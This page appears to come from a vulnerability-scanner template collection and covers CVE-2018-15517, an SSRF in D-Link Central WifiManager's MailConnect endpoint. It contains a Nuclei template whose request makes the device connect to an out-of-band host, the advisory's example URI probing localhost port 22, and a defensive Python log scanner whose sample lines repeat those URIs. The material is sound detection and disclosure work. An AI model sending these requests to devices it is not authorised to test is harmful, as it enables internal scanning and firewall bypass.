D-Link Central WifiManager - Server-Side Request Forgery
ID: CVE-2018-15517
Severity: high
Author: gy741
Tags: cve,cve2018,seclists,packetstorm,dlink,ssrf,oast
Description
D-Link Central WifiManager is susceptible to server-side request forgery. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI. This can undermine accountability for where scans or connections actually came from and/or bypass the firewall. Requests can be automated via a script or made from a browser.
YAML Source
id: CVE-2018-15517

info:
  name: D-Link Central WifiManager - Server-Side Request Forgery
  author: gy741
  severity: high
  description: D-Link Central WifiManager is susceptible to server-side request forgery. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI. This can undermine accountability of where scan or connections actually came from and or bypass the FW etc. This can be automated via script or using a browser.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access to internal resources, data leakage, and potential compromise of the entire network.
  remediation: |
    Apply the latest security patches or updates provided by D-Link to fix the SSRF vulnerability in Central WifiManager.
  reference:
    - http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SERVER-SIDE-REQUEST-FORGERY.txt
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15517
    - http://seclists.org/fulldisclosure/2018/Nov/28
    - http://packetstormsecurity.com/files/150243/D-LINK-Central-WifiManager-CWM-100-1.03-r0098-Server-Side-Request-Forgery.html
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N
    cvss-score: 8.6
    cve-id: CVE-2018-15517
    cwe-id: CWE-918
    epss-score: 0.01001
    epss-percentile: 0.83597
    cpe: cpe:2.3:a:dlink:central_wifimanager:1.03:r0098:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: dlink
    product: central_wifimanager
  tags: cve,cve2018,seclists,packetstorm,dlink,ssrf,oast

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php/System/MailConnect/host/{{interactsh-url}}/port/80/secure/"

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 4a0a00473045022100cb9b20de2e4454a69a86cec21397372933d284b770ec285c6fccd5c87d76406a02200b5cca19e297a98dd32e990326c393442cd9e7986554c0c2b010a6d66b4ee002:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-15517.yaml"
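To check whether the MailConnect endpoint described above has already been pointed at something other than a mail server, the following added example (not part of the template or the original advisory) scans web-server access logs for MailConnect requests and flags targets that are not approved mail hosts, use non-SMTP ports, or are internal addresses. The log format, the SMTP port set, the function names and the sample lines are assumptions made for illustration.

```python
import ipaddress
import re
from urllib.parse import unquote

# URI shape from the advisory: /index.php/System/MailConnect/host/<host>/port/<port>/secure/
MAILCONNECT = re.compile(r"/index\.php/System/MailConnect/host/(?P<host>[^/\s]+)/port/(?P<port>[^/\s]+)/secure", re.I)
# Assumption: "combined"-style access log, client address first, request line in quotes.
LOG_LINE = re.compile(r'^(?P<client>\S+) .*?"[A-Z]+ (?P<uri>\S+)')
SMTP_PORTS = {"25", "465", "587"}  # assumption: ports a genuine mail check would use


def classify(host, port, approved_hosts):
    """Return reasons a MailConnect target does not look like a mail-server check."""
    reasons = []
    if host.lower() not in approved_hosts:
        reasons.append("unapproved-host")
    if port not in SMTP_PORTS:
        reasons.append("non-smtp-port")
    try:
        ip = ipaddress.ip_address(host)
        internal = ip.is_loopback or ip.is_private or ip.is_link_local
    except ValueError:  # a hostname, not an IP literal
        internal = host.lower() == "localhost"
    if internal:
        reasons.append("internal-address")
    return reasons


def find_suspicious(lines, approved_hosts):
    """Return (client, host, port, reasons) for each flagged MailConnect request."""
    approved = {h.lower() for h in approved_hosts}
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        # Decode percent-encoding so an encoded host is compared in its real form.
        u = MAILCONNECT.search(unquote(m.group("uri"))) if m else None
        if u:
            reasons = classify(u["host"], u["port"], approved)
            if reasons:
                hits.append((m["client"], u["host"], u["port"], reasons))
    return hits


# Constructed sample lines (documentation addresses, not from a real device).
SAMPLE = [
    '198.51.100.7 - - [10/Nov/2018:10:00:01 +0000] "GET /index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ HTTP/1.1" 200 12',
    '192.0.2.10 - - [10/Nov/2018:10:05:00 +0000] "GET /index.php/System/MailConnect/host/smtp.example.com/port/587/secure/ HTTP/1.1" 200 12',
    '198.51.100.7 - - [10/Nov/2018:10:06:00 +0000] "GET /index.php/System/MailConnect/host/oob.example.net/port/80/secure/ HTTP/1.1" 200 12',
    '192.0.2.10 - - [10/Nov/2018:10:07:00 +0000] "GET /index.php/Home/index HTTP/1.1" 200 900',
]
```

Call `find_suspicious(SAMPLE, {"smtp.example.com"})` with the mail hosts your deployment actually uses; any returned tuple names the requesting client and the target the device was asked to connect to.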